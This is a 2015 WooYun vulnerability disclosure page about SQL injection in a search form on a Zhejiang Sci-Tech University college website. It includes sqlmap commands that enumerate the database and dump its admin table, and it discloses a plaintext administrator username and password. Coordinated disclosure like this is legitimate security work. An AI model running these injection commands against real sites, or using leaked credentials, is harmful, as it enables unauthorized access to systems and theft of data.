当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144325

漏洞标题:浙理工某学院SQL注入致拿后台管理员权限

相关厂商:浙江理工大学

漏洞作者: 0error-0warning

提交时间:2015-10-07 20:43

修复时间:2015-11-22 09:02

公开时间:2015-11-22 09:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

http://**.**.**.**/index.asp


sy.png


搜索框报错。

bc.png


上工具

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keywor
d=1&imageField.x=25&imageField.y=8" --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keywor
d=1&imageField.x=25&imageField.y=8" --tables --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Database: Microsoft_Access_masterdb
[8 tables]
+---------+
| user |
| admin |
| adv |
| article |
| class |
| config |
| job |
| log |
+---------+


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keywor
d=1&imageField.x=25&imageField.y=8" -T admin --dump --stop 1 --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+------+---------+----+----+----+----+-------+--------+--------+--------+--
-------+---------+----------+----------+----------+
| id | hide | classid | t2 | t1 | t3 | t4 | price | author | number | source | k
eyword | content | username | password | filename |
+----+------+---------+----+----+----+----+-------+--------+--------+--------+--
-------+---------+----------+----------+----------+
| 10 | 1 | 588 | NULL | NULL | NULL | NULL | NULL | s\\?8b | NULL | [f
| NULL | <blank> | wjxit | wjxit | <blank> |
+----+------+---------+----+----+----+----+-------+--------+--------+--------+--
-------+---------+----------+----------+----------+


账号:wjxit 密码:wjxit
Domain扫到后台

htdz.png


进入后台

后台.png


只是不知道为什么显示登陆ip是内网的。
其他管理员(早知道有弱口令管理员,就不用这么麻烦了)

账号管理.png


漏洞证明:

如上

修复方案:

好像很多东西都要修复。

版权声明:转载请注明来源 0error-0warning@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-08 09:01

厂商回复:

通知处理中

最新状态:

暂无


漏洞评价:

评价